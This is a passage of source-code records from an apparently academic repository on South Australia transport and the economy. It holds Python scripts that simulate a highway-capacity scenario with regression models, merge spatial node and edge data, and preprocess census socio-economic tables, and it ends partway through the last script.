"path": "/src/d05_model_evaluation/eval_hypo_scenario.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# evaluate the hypothetical scenario that highways have a better capacity.\n#\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.preprocessing import normalize\nfrom sklearn import linear_model\nimport copy\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_path = os.path.join(os.getcwd(),'data/04_models/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n# read data\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n node_df.reset_index()\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_df = pickle.load(f) # use only edge_consumption_df for policy simulation\n edge_df = edge_df.reset_index() # reset\n\n# read models\nwith open(model_path + 'model1_list_od_duration' + '.pickle', 'rb') as f:\n model1_list_od_duration = pickle.load(f)\n\nwith open(model_path + 'model2_list_consumption_amount_mcc_source' + '.pickle', 'rb') as f:\n model2_list_consumption_amount_mcc_source = pickle.load(f)\n\nwith open(model_path + 'model2_list_consumption_count_mcc_source' + '.pickle', 'rb') as f:\n model2_list_consumption_count_mcc_source = pickle.load(f)\n\nwith open(model_path + 'model2_list_flow_agents' + '.pickle', 'rb') as f:\n model2_list_flow_agents = pickle.load(f)\n\nwith open(model_path + 'model3_list_median_income_per_job_aud_persons' + '.pickle', 'rb') as f:\n model3_list_median_income_per_job_aud_persons = pickle.load(f)\n\n\n###########################################################################################\n# Forward pass for status quo and hypothetical case\n###########################################################################################\n\ndef forward_simulation(edge_df, node_df, status_quo = True):\n # predict and change four variables in edge_df:\n # od_duration, consumption_amount_mcc_source, consumption_count_mcc_source, flow_agents\n # predict five variables.\n #\n\n # model 1.\n # od_duration_pred is the output from the model 1.\n _, (y_name, x_name), model1 = model1_list_od_duration[-1]\n\n if status_quo == True:\n od_duration_pred = np.exp(model1.predict(sm.add_constant(np.log(edge_df[x_name])))) # remember the log and exponential transformation!\n else:\n model1.params['class_HWY'] = -0.48 # highway capacity increases by 20% compared to average\n od_duration_pred = np.exp(model1.predict(sm.add_constant(np.log(edge_df[x_name])))) # remember the log and exponential transformation!\n edge_df[y_name] = od_duration_pred # replace od_duration by predicted value\n\n # model 2.\n # three outputs:\n # model 2.1\n _, (y_name, x_name), model2_consumption_amount_mcc_source = model2_list_consumption_amount_mcc_source[-1]\n consumption_amount_mcc_source_pred = np.exp(model2_consumption_amount_mcc_source.predict(sm.add_constant(np.log(edge_df[x_name]))))\n edge_df[y_name] = consumption_amount_mcc_source_pred\n\n # model 2.2\n _, (y_name, x_name), model2_consumption_count_mcc_source = model2_list_consumption_count_mcc_source[-1]\n consumption_count_mcc_source_pred = np.exp(model2_consumption_count_mcc_source.predict(sm.add_constant(np.log(edge_df[x_name]))))\n edge_df[y_name] = consumption_count_mcc_source_pred\n\n # model 2.3\n _, (y_name, x_name), model2_flow_agents = model2_list_flow_agents[-1]\n flow_agents_pred = np.exp(model2_flow_agents.predict(sm.add_constant(np.log(edge_df[x_name]))))\n edge_df[y_name] = flow_agents_pred\n\n # model 3.\n _, (y_name, x_name), model3 = model3_list_median_income_per_job_aud_persons[-1]\n # change six columns in node_df: consumption_amount_mcc_source, consumption_count_mcc_source, flow_agents\n edge_df_relevant = edge_df[['O', 'D',\n 'consumption_amount_mcc_source',\n 'consumption_count_mcc_source',\n 'flow_agents']]\n\n sa2_flow_o = edge_df_relevant.groupby('O').aggregate(['sum']).reset_index()\n col_list = sa2_flow_o.columns\n col_new = [col[0]+'_o' for col in col_list]\n sa2_flow_o.columns = col_new\n\n sa2_flow_d = edge_df_relevant.groupby('D').aggregate(['sum']).reset_index()\n col_list = sa2_flow_d.columns\n col_new = [col[0]+'_d' for col in col_list]\n sa2_flow_d.columns = col_new\n\n node_df = node_df.merge(sa2_flow_o, left_on=['SA2_MAIN16'], right_on=['O_o'], how='left', suffixes=['_drop', ''])\n node_df = node_df.merge(sa2_flow_d, left_on=['SA2_MAIN16'], right_on=['D_d'], how='left', suffixes=['_drop', ''])\n\n # drop columns\n node_df = node_df.drop(columns=['D_o', 'O_d'])\n\n if status_quo == True:\n inc_pred = np.exp(model3.predict(sm.add_constant(np.log(node_df[x_name]))))\n else:\n model3.params['consumption_count_mcc_source_d'] = 0.0 # remove the insig parameter\n inc_pred = np.exp(model3.predict(sm.add_constant(np.log(node_df[x_name]))))\n\n return od_duration_pred, consumption_amount_mcc_source_pred, consumption_count_mcc_source_pred, flow_agents_pred, inc_pred\n\n\n# 1. Use the status quo\nstatus_quo = True\nod_duration_pred, consumption_amount_mcc_source_pred, consumption_count_mcc_source_pred, flow_agents_pred, inc_pred = \\\n forward_simulation(edge_df, node_df, status_quo)\n\n# create a econ_opportunity_status_quo_dic\n# format - metric_name: (target_var_name, time_var_name, attraction_param, friction_param, o_or_d)\necon_opportunity_input_dic = {'job_based_consumption_opportunity': ('job_density_1_o', 'od_duration', 0.047+0.064, 0.982, 'D'),\n 'pop_based_consumption_opportunity': ('pop_density_o', 'od_duration', 0.055+0.078, 0.982, 'D'),\n 'amenity_based_consumption_opportunity': ('poi_count_agg_density_o', 'od_duration', 0.037+0.141, 1.006, 'D'),\n 'diversity_based_consumption_opportunity': ('poi_entropy_agg_density_o', 'od_duration', 0.084+0.066, 1.002, 'D')\n }\n\n# status_quo_dic\necon_opportunity_status_quo_dic = {}\nfor metric_name in econ_opportunity_input_dic.keys():\n target_var_name, time_var_name, attraction_param, friction_param, o_or_d = econ_opportunity_input_dic[metric_name]\n metric_output = util.compute_econ_opportunity(metric_name, target_var_name, time_var_name, edge_df,\n attraction_param, friction_param, o_or_d)\n econ_opportunity_status_quo_dic[metric_name] = metric_output\n\n\n# 2. Use the hypothetical case\nstatus_quo = False\nod_duration_pred_new, consumption_amount_mcc_source_pred_new, consumption_count_mcc_source_pred_new, flow_agents_pred_new, inc_pred_new = \\\n forward_simulation(edge_df, node_df, status_quo)\n\n# compute economic opportunity metric (hypothetical case)\necon_opportunity_hypo_dic = {}\nfor metric_name in econ_opportunity_input_dic.keys():\n target_var_name, time_var_name, attraction_param, friction_param, o_or_d = econ_opportunity_input_dic[metric_name]\n metric_output = util.compute_econ_opportunity(metric_name, target_var_name, time_var_name, edge_df,\n attraction_param, friction_param, o_or_d)\n econ_opportunity_hypo_dic[metric_name] = metric_output\n\n\n# 3. Compare\nprint(np.sum(od_duration_pred_new - od_duration_pred))\nprint(np.sum(consumption_amount_mcc_source_pred_new - consumption_amount_mcc_source_pred))\nprint(np.sum(consumption_count_mcc_source_pred_new - consumption_count_mcc_source_pred))\nprint(np.sum(flow_agents_pred_new - flow_agents_pred))\nprint(np.sum(inc_pred_new - inc_pred)/np.sum(inc_pred))\nprint(np.sum(econ_opportunity_hypo_dic['job_based_consumption_opportunity']['job_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['job_based_consumption_opportunity']['job_based_consumption_opportunity']))\nprint(np.sum(econ_opportunity_hypo_dic['pop_based_consumption_opportunity']['pop_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['pop_based_consumption_opportunity']['pop_based_consumption_opportunity']))\nprint(np.sum(econ_opportunity_hypo_dic['amenity_based_consumption_opportunity']['amenity_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['amenity_based_consumption_opportunity']['amenity_based_consumption_opportunity']))\nprint(np.sum(econ_opportunity_hypo_dic['diversity_based_consumption_opportunity']['diversity_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['diversity_based_consumption_opportunity']['diversity_based_consumption_opportunity']))\n\n# save simulation results.\n# read node and edge.\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n node_df.reset_index()\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_df = pickle.load(f) # use only edge_consumption_df for policy simulation\n edge_df = edge_df.reset_index() # reset\n\nedge_df['od_duration_save'] = od_duration_pred - od_duration_pred_new # reverse the order because new od_duration is smaller.\nedge_df['consumption_amount_increase'] = consumption_amount_mcc_source_pred_new - consumption_amount_mcc_source_pred\nedge_df['consumption_count_increase'] = consumption_count_mcc_source_pred_new - consumption_count_mcc_source_pred\nedge_df['flow_agents_increase'] = flow_agents_pred_new - flow_agents_pred\nnode_df['income_increase'] = inc_pred_new - inc_pred\n\nnode_df['job_based_consumption_opportunity_increase'] = econ_opportunity_hypo_dic['job_based_consumption_opportunity']['job_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['job_based_consumption_opportunity']['job_based_consumption_opportunity']\nnode_df['pop_based_consumption_opportunity_increase'] = econ_opportunity_hypo_dic['pop_based_consumption_opportunity']['pop_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['pop_based_consumption_opportunity']['pop_based_consumption_opportunity']\nnode_df['amenity_based_consumption_opportunity_increase'] = econ_opportunity_hypo_dic['amenity_based_consumption_opportunity']['amenity_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['amenity_based_consumption_opportunity']['amenity_based_consumption_opportunity']\nnode_df['diversity_based_consumption_opportunity_increase'] = econ_opportunity_hypo_dic['diversity_based_consumption_opportunity']['diversity_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['diversity_based_consumption_opportunity']['diversity_based_consumption_opportunity']\n\n# save the status quo accessibility metrics\nnode_df['amenity_based_consumption_opportunity']=econ_opportunity_status_quo_dic['amenity_based_consumption_opportunity']['amenity_based_consumption_opportunity']\nnode_df['diversity_based_consumption_opportunity']=econ_opportunity_status_quo_dic['diversity_based_consumption_opportunity']['diversity_based_consumption_opportunity']\nnode_df['pop_based_consumption_opportunity']=econ_opportunity_status_quo_dic['pop_based_consumption_opportunity']['pop_based_consumption_opportunity']\nnode_df['job_based_consumption_opportunity']=econ_opportunity_status_quo_dic['job_based_consumption_opportunity']['job_based_consumption_opportunity']\n\n\n\n# save\nwith open(model_output_path+'edge_df_policy_simulation.pickle', 'wb') as f:\n pickle.dump(edge_df, f)\n\nwith open(model_output_path+'node_df_policy_simulation.pickle', 'wb') as f:\n pickle.dump(node_df, f)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6154303550720215,
"alphanum_fraction": 0.6416857838630676,
"avg_line_length": 47.60330581665039,
"blob_id": "a39eeade3cfc6d26a6586540299f298cc2cc75a3",
"content_id": "29f3d528121c3d3a81183aa662ffa3f6ab3202d3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11769,
"license_type": "permissive",
"max_line_length": 193,
"num_lines": 242,
"path": "/src/d03_processing/process_merge.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# This script combines the intermediate data into processed data\n# outputs:\n# node.pickle - shape: (110 * _) - all the nodal information\n# edge:pickle - shape: (12100 * _) - all the edge information\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport copy\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\n\n# read files\nsa2_adelaide_node = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide.shp')\nsa2_adelaide_edge = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide_edge.shp')\n# read six files\nwith open(intermediate_data_path+'sa2_node_with_socio_econ_df.pickle', 'rb') as f:\n sa2_node_with_socio_econ_df = pickle.load(f)\n\nwith open(intermediate_data_path+'sa2_node_with_POI_counts_entropy.pickle', 'rb') as f:\n sa2_node_with_POI_counts_entropy = pickle.load(f)\n\nwith open(intermediate_data_path+'sa2_node_with_only_transport_attributes.pickle', 'rb') as f:\n sa2_node_with_only_transport_attributes = pickle.load(f)\n\nwith open(intermediate_data_path+'sa2_edge_flow.pickle', 'rb') as f:\n sa2_edge_flow = pickle.load(f)\n\nwith open(intermediate_data_path+'sa2_edge_travel_time.pickle', 'rb') as f:\n sa2_edge_travel_time = pickle.load(f)\n\nwith open(intermediate_data_path+'sa2_edge_with_only_transport_attributes.pickle', 'rb') as f:\n sa2_edge_with_only_transport_attributes = pickle.load(f)\n\n# drop geometry columns\nsa2_edge_flow.drop(columns=['geometry'],inplace=True)\nsa2_edge_with_only_transport_attributes.drop(columns=['geometry'],inplace=True)\nsa2_node_with_POI_counts_entropy.drop(columns=['geometry'],inplace=True)\nsa2_node_with_only_transport_attributes.drop(columns=['geometry'],inplace=True)\n\n# only subset of socio-econ variables are needed for now.\nsa2_node_with_socio_econ_df = sa2_node_with_socio_econ_df[['sa2_code16',\n 'num_jobs_000_persons',\n 'median_income_per_job_aud_persons',\n 'tot_num_jobs_000',\n 'total_pop',\n 'avg_age',\n 'male_percent',\n 'female_percent',\n 'bachelor_degree_percent',\n 'master_degree_percent',\n 'perc_indig_age_0_14',\n 'perc_indig_age_15_34',\n 'perc_indig_age_35_64',\n 'poverty_rate_1',\n 'poverty_rate_2',\n 'unemployment_rate',\n 'median_inc',\n 'gini']]\n\n#region 1. merge edge files\n# sa2_adelaide_edge, sa2_edge_flow, sa2_edge_travel_time, sa2_edge_with_only_transport_attributes\n# disaggregate nodal files: sa2_node_with_POI_counts_entropy, sa2_node_with_socio_econ_df.\nedge = copy.copy(sa2_adelaide_edge)\n\n# merge with edge files\nedge = edge.merge(sa2_edge_flow, left_on=['O','D'], right_on=['O','D'], how='left')\nedge = edge.merge(sa2_edge_travel_time, left_on=['O','D'], right_on=['O','D'], how='left')\nedge = edge.merge(sa2_edge_with_only_transport_attributes, left_on=['O','D'], right_on=['O','D'], how='left')\n\n# add nodal files to the edge files\nedge = edge.merge(sa2_node_with_POI_counts_entropy, left_on=['O'], right_on=['SA2_MAIN16'], how='left')\nedge = edge.merge(sa2_node_with_POI_counts_entropy, left_on=['D'], right_on=['SA2_MAIN16'], suffixes=['_o', '_d'], how='left')\nedge = edge.merge(sa2_node_with_socio_econ_df, left_on=['O'], right_on=['sa2_code16'], how='left')\nedge = edge.merge(sa2_node_with_socio_econ_df, left_on=['D'], right_on=['sa2_code16'], suffixes=['_o', '_d'], how='left')\n\n# save edge\nedge.to_pickle(processing_data_path+'edge_shp.pickle')\n\n#endregion\n\n\n#region 2. merge nodal files\n# sa2_adelaide_node, sa2_node_with_socio_econ_df, sa2_node_with_POI_counts_entropy, sa2_node_with_only_transport_attributes;\nnode = copy.copy(sa2_adelaide_node)\nnode = node.merge(sa2_node_with_socio_econ_df, left_on=['SA2_MAIN16'], right_on=['sa2_code16'], how='left')\nnode = node.merge(sa2_node_with_POI_counts_entropy, left_on=['SA2_MAIN16'], right_on=['SA2_MAIN16'], how='left')\nnode = node.merge(sa2_node_with_only_transport_attributes, left_on=['SA2_MAIN16'], right_on=['SA2_MAIN16'], how='left')\n\n# aggregate edge info to O and D. sa2_edge_flow\n# Then add O and D info to the nodal file\nsa2_flow_o = sa2_edge_flow.groupby('O').aggregate(['sum']).reset_index()\ncol_list = sa2_flow_o.columns\ncol_new = [col[0]+'_o' for col in col_list]\nsa2_flow_o.columns = col_new\n\nsa2_flow_d = sa2_edge_flow.groupby('D').aggregate(['sum']).reset_index()\ncol_list = sa2_flow_d.columns\ncol_new = [col[0]+'_d' for col in col_list]\nsa2_flow_d.columns = col_new\n\nnode = node.merge(sa2_flow_o, left_on=['SA2_MAIN16'], right_on=['O_o'], how='left')\nnode = node.merge(sa2_flow_d, left_on=['SA2_MAIN16'], right_on=['D_d'], how='left')\n\n# drop two columns\nnode = node.drop(columns=['D_o', 'O_d'])\n\n# change data types\nnode[['num_nodes', 'num_1degree', 'num_2degree', 'num_3degree', 'num_4degree', 'num_greater5degree']] = \\\n node[['num_nodes', 'num_1degree', 'num_2degree', 'num_3degree', 'num_4degree', 'num_greater5degree']].astype('int64')\n\n# add pop density variable\nnode['pop_density'] = node['total_pop']/(node.area * 1000)\n\n# add POI densities\nnode['poi_count_density']=node['poi_count']/(1000*node.area)\nnode['poi_count_agg_density']=node['poi_count_agg']/(1000*node.area)\nnode['poi_entropy_density']=node['poi_entropy']/(1000*node.area)\nnode['poi_entropy_agg_density']=node['poi_entropy_agg']/(1000*node.area)\n\n# add job densities\nnode['job_density_1']=node['num_jobs_000_persons']/(1000*node.area)\nnode['job_density_2']=node['tot_num_jobs_000']/(1000*node.area)\n\n# add o and d info together\nnode['flow_agents'] = node['flow_agents_o'] + node['flow_agents_d']\nnode['flow_duration'] = node['flow_duration_o'] + node['flow_duration_d']\nnode['flow_stays'] = node['flow_stays_o'] + node['flow_stays_d']\nnode['consumption_count_age_source'] = node['consumption_count_age_source_o'] + node['consumption_count_age_source_d']\nnode['consumption_amount_age_source'] = node['consumption_amount_age_source_o'] + node['consumption_amount_age_source_d']\nnode['consumption_count_mcc_source'] = node['consumption_count_mcc_source_o'] + node['consumption_count_mcc_source_d']\nnode['consumption_amount_mcc_source'] = node['consumption_amount_mcc_source_o'] + node['consumption_amount_mcc_source_d']\n\n# save node\nnode.to_pickle(processing_data_path+'node_shp.pickle')\n#endregion\n\n\n\n#region 3. processing node and edge shapefiles into three data frames\n# read node and edge pickles\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node = pickle.load(f)\n\nwith open(processing_data_path+'edge_shp.pickle', 'rb') as f:\n edge = pickle.load(f)\n\n# create dataframes to facilitate viewing as dataframes in pycharm\nnode_df = pd.DataFrame(node.drop(columns=['geometry']))\nedge_df = pd.DataFrame(edge.drop(columns=['geometry']))\n\n# edit node_df\nprint(np.sum(node_df.isna()))\nprint(np.sum(node_df==0))\nprint(node_df.describe())\n# processing na and zeros for regression on the log space\nnode_df.dropna(how='any',inplace=True)\nprint(node_df.shape) # dropped 6 observations. Left with 104 obs.\nnon_zero_masks = np.logical_and(node_df.bachelor_degree_percent>0.00001, node_df.flow_agents_o>0.00001)\nnon_zero_masks = np.logical_and(node_df.poi_entropy_agg>0.00001, non_zero_masks)\nnode_df = node_df.loc[non_zero_masks, :]\nprint(node_df.shape) # dropped 2 observations. Left with 102 obs.\n\n# lift all road attributes by one for the log transformation.\nroad_attributes = ['class_ART',\n 'class_BUS', 'class_COLL', 'class_HWY', 'class_LOCL',\n 'class_SUBA', 'class_TRK2', 'class_TRK4', 'class_UND', 'num_roads', 'num_nodes',\n 'num_1degree', 'num_2degree', 'num_3degree', 'num_4degree',\n 'num_greater5degree']\nnode_df[road_attributes] += 1.0\n\n\n# edit edge_df\nprint(np.sum(edge_df.isna()))\nprint(np.sum(edge_df==0))\nprint(edge_df.describe())\n# drop self loops (110) and zero population areas (440)\nnon_zero_masks = np.logical_and(edge_df.od_duration > 0.000001, edge_df.total_pop_o > 0.000001) # od_duration and total_pop_o\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.total_pop_d > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.avg_age_o > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.avg_age_d > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.bachelor_degree_percent_o > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.bachelor_degree_percent_d > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.poi_entropy_agg_o > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.poi_entropy_agg_d > 0.000001)\nedge_df = edge_df.loc[non_zero_masks, :]\n\n\n# attach POI density (O and D) to edge_df\nedge_df = edge_df.merge(node_df[['SA2_MAIN16', 'pop_density', 'poi_count_density', 'poi_count_agg_density', 'poi_entropy_density', 'poi_entropy_agg_density', 'job_density_1', 'job_density_2']],\n left_on = 'O', right_on = 'SA2_MAIN16')\nedge_df = edge_df.merge(node_df[['SA2_MAIN16', 'pop_density', 'poi_count_density', 'poi_count_agg_density', 'poi_entropy_density', 'poi_entropy_agg_density', 'job_density_1', 'job_density_2']],\n left_on = 'D', right_on = 'SA2_MAIN16', suffixes = ['_o', '_d'])\n\n\n# split edge_df into edge_consumption_df and edge_flow_df\n# it is because the consumption data have a lot of missing info.\nedge_flow_df = edge_df.loc[~edge_df.flow_agents.isna(), ]\nedge_consumption_df = edge_df.loc[~edge_df.consumption_count_age_source.isna(), ]\n\n#\nedge_flow_df = edge_flow_df.drop(columns = ['consumption_count_age_source', 'consumption_amount_age_source',\n 'consumption_count_mcc_source', 'consumption_amount_mcc_source'])\nedge_flow_df.dropna(how='any', inplace=True)\nedge_consumption_df.dropna(how='any', inplace=True)\n\n# lift road attributes by one unit.\nedge_flow_df[road_attributes] += 1.0\nedge_consumption_df[road_attributes] += 1.0\n\n# print dimensions\nprint(\"Final edge mobility flow dataframe dim is: \", edge_flow_df.shape)\nprint(\"Final edge consumption flow dataframe dim is: \", edge_consumption_df.shape)\nprint(\"Final node dataframe dim is: \", node_df.shape)\n\n# check the final\nprint(np.sum(node_df.isna()))\nprint(np.sum(node_df == 0))\nprint(np.sum(edge_flow_df.isna()))\nprint(np.sum(edge_flow_df == 0))\nprint(np.sum(edge_consumption_df.isna()))\nprint(np.sum(edge_consumption_df == 0))\n\n# save dataframes\nnode_df.to_pickle(processing_data_path+'node_df.pickle')\nedge_flow_df.to_pickle(processing_data_path+'edge_flow_df.pickle')\nedge_consumption_df.to_pickle(processing_data_path+'edge_consumption_df.pickle')\n#endregion\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5783922076225281,
"alphanum_fraction": 0.6274449825286865,
"avg_line_length": 38.350807189941406,
"blob_id": "95e25d517063567df551342acac30dbcdf7342ed",
"content_id": "1c0a0e82072156db1b661344d03c44e4cdc04060",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9765,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 248,
"path": "/src/d02_intermediate/preprocess_1_socioecon.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# preprocessing the socioeconomic variables\n# inputs: five raw socio-demographcics data.\n# outputs: one combined socio-econ geopandas data frame.\n\n# import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n\n# # raw data\n# mount_path = \"/Users/shenhaowang/Dropbox (MIT)/project_econ_opportunity_south_Australia\"\n\n\n#region 1. read and edit job and income data frames\njobs_all = pd.read_csv(raw_data_path + \"SA2_Jobs_All_Jobs_and_Income.csv\")\njobs_industries = pd.read_csv(raw_data_path + \"SA2_Jobs_In_Australia_Employee_Jobs_and_Income.csv\")\n\n# change column names for the two jobs data frame.\nnew_idx = []\nfor col in jobs_industries.columns:\n if col[0] == ' ':\n new_idx.append(col[1:])\n else:\n new_idx.append(col)\n\njobs_industries.columns = new_idx\n\nnew_idx = []\nfor col in jobs_all.columns:\n if col[0] == ' ':\n new_idx.append(col[1:])\n else:\n new_idx.append(col)\n\njobs_all.columns = new_idx\n\n# change types of job data frames\njobs_all['sa2_code16'] = jobs_all['sa2_code16'].astype('str')\njobs_industries['sa2_code16'] = jobs_industries['sa2_code16'].astype('str')\n# useful variables: all\n#endregion\n\n\n#region 2. read and edit age dataframe\nage_df = pd.read_csv(raw_data_path + \"data_age.csv\")\n# choose one section of age df\nage_df = age_df[[' sa2_main16', 'p_tot_75_84_yrs', ' p_tot_35_44_yrs', ' p_tot_45_54_yrs', ' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs', ' p_tot_55_64_yrs', ' p_tot_tot']]\n\nfor col in ['p_tot_75_84_yrs', ' p_tot_35_44_yrs', ' p_tot_45_54_yrs', ' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs', ' p_tot_55_64_yrs']:\n age_df[col] = age_df[col] / age_df[\" p_tot_tot\"] # compute percentage\n\navg_med_age = []\nfor idx, row in age_df.iterrows():\n avg = 0\n for col in ['p_tot_75_84_yrs', ' p_tot_35_44_yrs',\n ' p_tot_45_54_yrs', ' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs',\n ' p_tot_55_64_yrs']:\n if col != \" p_tot_85ov\":\n temp = col.split(\"_\")\n x = int(temp[2])\n y = int(temp[3])\n med = (x + y) / 2\n avg += (row[col] * med)\n else:\n avg += (row[col] * 85)\n # avg = avg/row[' p_tot_tot']\n avg_med_age.append(avg)\n\n# create average age column\nage_df[\"avg_age\"] = avg_med_age\n\n# edit sa2_main16 type\nage_df[' sa2_main16'] = age_df[' sa2_main16'].astype('str')\n\n# rename the columns\nrename_dic = {'p_tot_75_84_yrs':'percent_75_84_yrs',\n ' p_tot_35_44_yrs':'percent_35_44_yrs',\n ' p_tot_45_54_yrs':'percent_45_54_yrs',\n ' p_tot_25_34_yrs':'percent_25_34_yrs',\n ' p_tot_85ov':'percent_85ov_yrs',\n ' p_tot_65_74_yrs':'percent_65_74_yrs',\n ' p_tot_20_24_yrs':'percent_20_24_yrs',\n ' p_tot_15_19_yrs':'percent_15_19_yrs',\n ' p_tot_55_64_yrs':'percent_55_64_yrs',\n ' p_tot_tot':'total_pop',\n ' sa2_main16':'sa2_main16'}\n\n\nage_df.rename(columns=rename_dic, inplace=True)\n# note: average age = NaN or zero exists, because many zones don't have population..\n# useful variables: all.\n#endregion\n\n\n#region 3. read and edit gender and education dataframe\ngender_educ_df = pd.read_csv(raw_data_path + \"data_gender_educ.csv\")\nall_educ_df = pd.read_csv(raw_data_path + \"data_all_educ.csv\")\n\n#\ngender_educ_df[\" gender_tot_tot\"] = gender_educ_df[\" m_tot_tot\"] + gender_educ_df[\" f_tot_tot\"]\n\nfor col in ['m_tot_75_84_yr', ' m_adv_dip_dip_total', ' m_tot_35_44_yr',\n ' m_tot_55_64_yr', ' f_b_deg_tot', ' m_tot_85_yr_over',\n ' f_tot_55_64_yr', ' f_cer_tot_tot', ' f_tot_65_74_yr',\n ' f_tot_15_24_yr', ' m_grad_dip_cer_tot',\n ' f_tot_75_84_yr', ' f_tot_45_54_yr', ' m_tot_45_54_yr',\n ' f_adv_dip_dip_total', ' f_tot_35_44_yr', ' m_tot_25_34_yr',\n ' m_pg_deg_tot', ' m_tot_65_74_yr', ' m_tot_15_24_yr',\n ' f_pguate_deg_tot', ' m_b_deg_tot', ' m_cer_tot_tot',\n ' f_tot_25_34_yr', ' f_grad_dip_cer_tot',\n ' f_tot_85_yr_over']:\n g = col.split(\"_\")[0]\n if g in {\" m\", \"m\"}:\n gender_educ_df[col] = gender_educ_df[col] / gender_educ_df[\" m_tot_tot\"]\n else:\n gender_educ_df[col] = gender_educ_df[col] / gender_educ_df[\" f_tot_tot\"]\n\ngender_educ_df[\"male_percent\"] = gender_educ_df[\" m_tot_tot\"]/gender_educ_df[\" gender_tot_tot\"]\ngender_educ_df[\"female_percent\"] = gender_educ_df[\" f_tot_tot\"]/gender_educ_df[\" gender_tot_tot\"]\n\n# edit sa2_main var\nhelper = [str(elt) for elt in gender_educ_df[\" sa2_main16\"].values]\ngender_educ_df[\"SA2_MAIN16\"] = helper\n\n#\nall_educ_df['bachelor_degree_percent'] = all_educ_df[' p_b_deg_tot']/all_educ_df[' p_tot_tot']\nall_educ_df['master_degree_percent'] = all_educ_df[' p_grad_dip_cer_tot']/all_educ_df[' p_tot_tot']\n\n#\nall_educ_df.rename(columns={' sa2_main16':'sa2_main16'},inplace=True)\n\n#\nall_educ_df['sa2_main16']=all_educ_df['sa2_main16'].astype('str')\n\n#\ngender_educ_df = gender_educ_df[['SA2_MAIN16', 'male_percent', 'female_percent']]\nall_educ_df = all_educ_df[['sa2_main16', 'bachelor_degree_percent', 'master_degree_percent']]\n#endregion\n\n\n#region 4. read and edit indigenous social variables\nindigenous_social_df = pd.read_csv(raw_data_path + \"data_indigenous.csv\")\n\n# replace names\nrename_dic = {'perc_indig_age_0_14':'perc_indig_age_0_14',\n ' perc_indig_hsld_equiv_inc_less_than_300':'perc_indig_hsld_equiv_inc_less_than_300',\n ' perc_indig_rent_oth_dwl':'perc_indig_rent_oth_dwl',\n ' perc_indig_no_vehicle_in_hsld':'perc_indig_no_vehicle_in_hsld',\n ' perc_indig_age_65_over':'perc_indig_age_65_over',\n ' perc_indig_rent_priv_dwl':'perc_indig_rent_priv_dwl',\n ' perc_indig_rent_pub_dwl':'perc_indig_rent_pub_dwl',\n ' perc_indig_f':'perc_indig_f',\n ' perc_indig_owned_outright_dwl':'perc_indig_owned_outright_dwl',\n ' 